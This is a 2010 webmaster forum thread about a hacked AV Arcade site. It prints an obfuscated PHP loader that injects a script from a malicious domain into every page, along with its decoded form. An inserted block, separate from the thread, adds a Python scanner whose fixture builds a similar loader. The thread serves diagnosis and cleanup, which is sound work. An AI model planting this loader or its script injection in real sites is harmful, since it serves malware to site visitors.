Another attempt to hack an AV Arcade site



Mircea007
10-31-2010, 08:29 PM
I'm not sure yet, I'm still looking into it... but I think my site got attacked by some malware.
When I opened my site this morning it redirected me to another page..... I opened it again and that didn't happen anymore.... I opened it with IE and some other stuff popped up, like an antivirus was trying to scan my computer.

I opened index.php and I found this at the top

/**/ $_8b7b="\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6e";$_8b7b1f="\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65";$_8b7b1f56=$_8b7b("",$_8b7b1f("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21ybm8nXSkpeyAgICRHTE9CQUxTWydtcm5vJ109MTsgICBpZighZnVuY3Rpb25fZXhpc3RzKCdjcm9wZXJ4JykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2FkZHhpdCcpKXsgICAgIGZ1bmN0aW9uIGFkZHhpdCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk5cGJuTnZiVzVwWVdKdmJHUnBibVp2YjNKbkxtTnZiUzlzYkM1d2FIQS9hejB4SWo0OEwzTmpjbWx3ZEQ0PSIpOyAgICAgIH0gICAgICByZXR1cm4gIiI7ICAgICB9ICAgIH0gICAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2d6ZGVjb2RlJykpeyAgICAgZnVuY3Rpb24gZ3pkZWNvZGUoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0Qyl7ICAgICAgJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RD1Ab3JkKEBzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywzLDEpKTsgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PTEwOyAgICAgICRSQTNENTJFNTJBNDg5MzZDREUwRjUzNTZCQjA4NjUyRjI9MDsgICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjQpeyAgICAgICAkUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCPUB1bnBhY2soJ3YnLHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLDEwLDIpKTsgICAgICAgJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQj0kUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCWzFdOyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5Kz0yKyRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI7ICAgICAgfSAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmOCl7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9QHN0cnBvcygkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLGNocigwKSwkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSsxOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjE2KXsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT1Ac3RycG9zKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsY2hyKDApLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKzE7ICAgICAgfSAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmMil7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkrPTI7ICAgICAgfSAgICAgICRSMDM0QUUyQUI5NEY5OUNDODFCMzg5QTE4MjJEQTMzNTM9QGd6aW5mbGF0ZShAc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkpOyAgICAgIGlmKCRSMDM0QUUyQUI5NEY5OUNDODFCMzg5QTE4MjJEQTMzNTM9PT1GQUxTRSl7ICAgICAgICRSMDM0QUUyQUI5NEY5OUNDODFCMzg5QTE4MjJEQTMzNTM9JFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QzsgICAgICB9ICAgICAgcmV0dXJuICRSMDM0QUUyQUI5NEY5OUNDODFCMzg5QTE4MjJEQTMzNTM7ICAgICB9ICAgIH0gICAgZnVuY3Rpb24gY3JvcGVyeCgkUkU4MkVFOUIxMjFGNzA5ODk1RUY1NEVCQTdGQTZCNzhCKXsgICAgIEhlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyAgICAgJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERT1nemRlY29kZSgkUkU4MkVFOUIxMjFGNzA5ODk1RUY1NEVCQTdGQTZCNzhCKTsgICAgICAgaWYocHJlZ19tYXRjaCgnL1w8XC9ib2R5L3NpJywkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFKSl7ICAgICAgcmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPFwvYm9keVteXD5dKlw+KS9zaScsYWRkeGl0KCkuIlxuIi4nJDEnLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpOyAgICAgfWVsc2V7ICAgICAgcmV0dXJuICRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUuYWRkeGl0KCk7ICAgICB9ICAgIH0gICAgb2Jfc3RhcnQoJ2Nyb3BlcngnKTsgICB9ICB9"));$_8b7b1f56();?>
<?php




Any ideas?

Chuckun
11-01-2010, 12:32 AM
That would be an injection of some description..

Either they used a shell script to edit the file directly - to do this they would've had to upload the shell script to your arcade via an insecure submission... This could be a form or upload script, possibly a shoddy modification?

Also, they could've simply hacked into your cPanel and edited the file.. Or retrieved your password via malware/keyloggers within your computer..

Chuckun

Mircea007
11-01-2010, 12:39 AM
Well, I deleted that part. How do I find what file they uploaded?

GoalieGuy6
11-01-2010, 01:16 AM
I don't know how they got in, but after reverse-engineering the script here's what it looks like. Basically it just adds an external JavaScript into your page.

Btw, would your domain happen to be hosted with GoDaddy (http://blog.sucuri.net/2010/10/attacks-on-godaddy-sites-insomniaboldinfoorg-com.html)?

It adds this to your page. I'd see if you can find any info on that site.

<script src="http://insomniaboldinfoorg.com/ll.php?k=1"></script>

This is what the code looks like.

<?php
// Decoded form of the loader above: the two \x-escaped strings are
// "create_function" and "base64_decode", so the base64 blob is the body
// of an anonymous function that is compiled and then called once.
$myFunction = create_function("", <<<'PHP'
if(function_exists('ob_start') && !isset($GLOBALS['mrno']))
{
    $GLOBALS['mrno'] = 1; // run-once guard: the block is prepended to every file

    if(!function_exists('croperx'))
    {
        if(!function_exists('addxit'))
        {
            // The payload: an external script tag, withheld from search-engine crawlers
            function addxit(){
                if (!stristr($_SERVER["HTTP_USER_AGENT"], "googlebot") && (!stristr($_SERVER["HTTP_USER_AGENT"], "yahoo")))
                {
                    return '<script src="http://insomniaboldinfoorg.com/ll.php?k=1"></script>';
                }
                return "";
            }
        }

        // Fallback gzip decoder for PHP builds without gzdecode(), so the page can
        // still be rewritten when output buffering has already gzip-compressed it
        if(!function_exists('gzdecode'))
        {
            function gzdecode($Variable_1)
            {
                $Variable_2 = ord(substr($Variable_1, 3, 1)); // gzip FLG byte
                $Variable_3 = 10;                              // fixed header length
                $Variable_4 = 0;

                if($Variable_2 & 4) // FEXTRA: skip the extra field
                {
                    $Variable_5 = @unpack('v', substr($Variable_1, 10, 2));
                    $Variable_5 = $Variable_5[1];
                    $Variable_3 += 2 + $Variable_5;
                }

                if($Variable_2 & 8) // FNAME: skip the NUL-terminated file name
                {
                    $Variable_3 = strpos($Variable_1, chr(0), $Variable_3) + 1;
                }

                if($Variable_2 & 16) // FCOMMENT: skip the NUL-terminated comment
                {
                    $Variable_3 = strpos($Variable_1, chr(0), $Variable_3) + 1;
                }

                if($Variable_2 & 2) // FHCRC: skip the header CRC16
                {
                    $Variable_3 += 2;
                }

                $Variable_6 = gzinflate(substr($Variable_1, $Variable_3));

                if($Variable_6 === FALSE)
                {
                    $Variable_6 = $Variable_1; // not gzip after all: use the raw buffer
                }

                return $Variable_6;
            }
        }

        // Output-buffer callback: inject the script tag just before </body>
        // (or at the very end if the page has no body tag)
        function croperx($Variable_7)
        {
            Header('Content-Encoding: none');
            $Variable_8 = gzdecode($Variable_7);
            if(preg_match('/\<\/body/si', $Variable_8))
            {
                return preg_replace('/(\<\/body[^\>]*\>)/si', addxit() . "\n" . '$1', $Variable_8);
            }
            else
            {
                return $Variable_8 . addxit();
            }
        }

        ob_start('croperx');
    }
}
PHP
);

$myFunction();
?>
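
A defender-side helper for the loader shown in this post, added here as an example; it is not code from the thread, from AV Arcade or from the Sucuri article. It is written in Python rather than PHP because it is meant to run on an administrator's workstation over a copy of the webroot, not on the compromised server. It undoes the two layers GoalieGuy6 describes (the \x-escaped function names and the base64 body, plus the base64-encoded script tag inside that body), reports which external script URL a file would inject, and can strip the prepended block so the file's own <?php tag comes first again. The loader shape it matches, the function names, and the test fixture with the placeholder domain malicious.example are assumptions modelled on the sample in the thread.

```python
import base64
import os
import re
from dataclasses import dataclass
from typing import List, Optional

# Double-quoted PHP string built only from \xNN escapes; forum/editor wrapping
# may have inserted a stray space ("\x 69"), so whitespace is tolerated.
HEX_STRING_RE = re.compile(r'"((?:\\x\s*[0-9a-fA-F]{2}\s*)+)"')
# Long base64-looking literal passed as a call argument, e.g. base64_decode("...")
# or the obfuscated $_8b7b1f("..."); PHP's base64_decode() skips whitespace.
B64_ARG_RE = re.compile(r'\(\s*"([A-Za-z0-9+/=\s]{20,})"\s*\)')
SCRIPT_SRC_RE = re.compile(r'<script[^>]*\bsrc=["\']([^"\']+)["\']', re.IGNORECASE)
# Whole prepended block: from '/**/ $_x="\x..."' to the first '$_y();?>' (assumed
# shape, modelled on the sample in the thread).
LOADER_RE = re.compile(
    r'/\*\*/\s*\$_\w+="(?:\\x\s*[0-9a-fA-F]{2}\s*)+".*?\$_\w+\(\);\?>\s*', re.DOTALL)
SUSPICIOUS_NAMES = {"create_function", "base64_decode", "gzinflate", "eval"}

@dataclass
class Finding:
    path: str
    hidden_calls: List[str]  # function names that were hidden behind \x escapes
    payload: str             # the PHP that create_function() would compile
    script_srcs: List[str]   # external scripts the payload injects

def decode_hex_string(escaped: str) -> str:
    """'\\x63\\x72' -> 'cr'; a stray space between \\x and the digits is ignored."""
    return "".join(chr(int(h, 16)) for h in re.findall(r'\\x\s*([0-9a-fA-F]{2})', escaped))

def php_b64decode(blob: str) -> bytes:
    """Mimic PHP's lenient base64_decode(): drop non-alphabet characters, then re-pad."""
    cleaned = re.sub(r'[^A-Za-z0-9+/]', '', blob)
    return base64.b64decode(cleaned + '=' * (-len(cleaned) % 4))

def analyse_loader(source: str, path: str = "<string>") -> Optional[Finding]:
    """Return a Finding if `source` carries the hex-escaped/base64 loader, else None."""
    hidden = [decode_hex_string(m) for m in HEX_STRING_RE.findall(source)]
    if not SUSPICIOUS_NAMES.intersection(hidden):
        return None
    payload, srcs = "", []
    for blob in B64_ARG_RE.findall(source):
        try:
            payload = php_b64decode(blob).decode("latin-1")
        except ValueError:
            continue
        # Second layer: the payload base64-encodes the <script> tag it appends.
        for inner in B64_ARG_RE.findall(payload):
            try:
                srcs += SCRIPT_SRC_RE.findall(php_b64decode(inner).decode("latin-1"))
            except ValueError:
                pass
        srcs += SCRIPT_SRC_RE.findall(payload)
    return Finding(path, hidden, payload, srcs)

def remove_loader(source: str) -> str:
    """Strip the prepended block so the file's own <?php tag comes first again."""
    return LOADER_RE.sub("", source, count=1)

def scan_directory(root: str) -> List[Finding]:
    """Walk a copy of the webroot and report every PHP/HTML file carrying the loader."""
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.lower().endswith((".php", ".html", ".htm")):
                path = os.path.join(dirpath, name)
                with open(path, encoding="latin-1") as fh:
                    hit = analyse_loader(fh.read(), path)
                if hit:
                    findings.append(hit)
    return findings

def build_sample_loader(script_url: str) -> str:
    """Constructed test fixture shaped like the thread's loader, with a placeholder
    URL; it only defines addxit() and never installs an output-buffer hook."""
    def hexify(s: str) -> str:
        return '"' + "".join(f"\\x{ord(c):02x}" for c in s) + '"'
    inner = base64.b64encode(f'<script src="{script_url}"></script>'.encode()).decode()
    body = ("if(!isset($GLOBALS['mrno'])){$GLOBALS['mrno']=1;"
            f'function addxit(){{return base64_decode("{inner}");}}}}')
    outer = base64.b64encode(body.encode()).decode()
    outer = " ".join(outer[i:i + 50] for i in range(0, len(outer), 50))  # forum-style wrap
    return (f'/**/ $_a={hexify("create_function")};$_b={hexify("base64_decode")};'
            f'$_c=$_a("",$_b("{outer}"));$_c();?>\n<?php\n')

if __name__ == "__main__":
    import sys
    import tempfile
    if len(sys.argv) > 1:
        root = sys.argv[1]  # a copy of the webroot to scan
    else:  # no path given: demonstrate on a constructed infected file
        root = tempfile.mkdtemp()
        with open(os.path.join(root, "index.php"), "w") as fh:
            fh.write(build_sample_loader("http://malicious.example/ll.php?k=1") + "echo 'hi';\n")
    for f in scan_directory(root):
        print(f"{f.path}: hidden calls {sorted(SUSPICIOUS_NAMES & set(f.hidden_calls))}, "
              f"injects {f.script_srcs}")
```

Run it with the path of a downloaded copy of the site to list every file that carries the block and the URL it would inject; with no argument it runs against the constructed fixture. The script only reports and, through remove_loader(), strips the prepended block it recognises; it does not find out how the block got there, which is why the access-log check GoalieGuy6 suggests still matters.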

Mircea007
11-01-2010, 02:08 AM
That is weird. I guess I'll take my user submission down until I can fix it so this doesn't happen again. How do I take care of that? And yes, I am with GoDaddy.

GoalieGuy6
11-01-2010, 02:21 AM
It seems to have been a problem with GoDaddy, it may not have been a vulnerability in your site. You should probably contact them.

Mircea007
11-01-2010, 03:16 AM
I talked to GoDaddy, they said they will search to see if there is an issue on their part. In the meantime, how do I get rid of that? Should I just delete the code? Where did you pull that code from, Goalie..... index.php?

Chuckun
11-01-2010, 03:45 PM
You should definitely delete the code..

The code that Goalie told you about was actually a decoded version of what you posted (he basically reversed the base64 (or whatever) encoding).

Jack

Mircea007
11-01-2010, 03:58 PM
That code is at the beginning of each page, every single file in my website.... so there has to be a source but I can't find it.....

If I open the page source with Firefox, all the way at the bottom it has the script, but I don't know where that is located. Maybe if I delete the origin the other things will be OK.

GoalieGuy6
11-01-2010, 07:26 PM
If you look at the article I linked to, there is a script that can be used to automatically clean all your files near the bottom of it. You should also look at your access logs and see if you can figure out when/how the code got added.

Mircea007
11-01-2010, 10:06 PM
Thank you Goalie, I didn't notice the article. I did what it said there and it got rid of the problem in 2 min and all the code was deleted. Now I just have to figure out how they did that; I think it's mostly GoDaddy's fault.

GoalieGuy6
11-01-2010, 10:37 PM
You're welcome :)

Now you just need to figure out how the code got in.

Bad Wolf
11-01-2010, 11:09 PM
And get a new host, bro. GoDaddy's great for buying domains but is a really bad choice for a host IMO. They have a pretty bad rep for having lax security, among other things. But of course their thing ain't hosting, so that's why. Still, you'd think they make enough money to afford to have decent security for their clients.

Mircea007
11-01-2010, 11:37 PM
True, I will look to see some other hosting options. I've been with GoDaddy since I started the site and never had problems. The server never crashed or anything, but security is a main factor.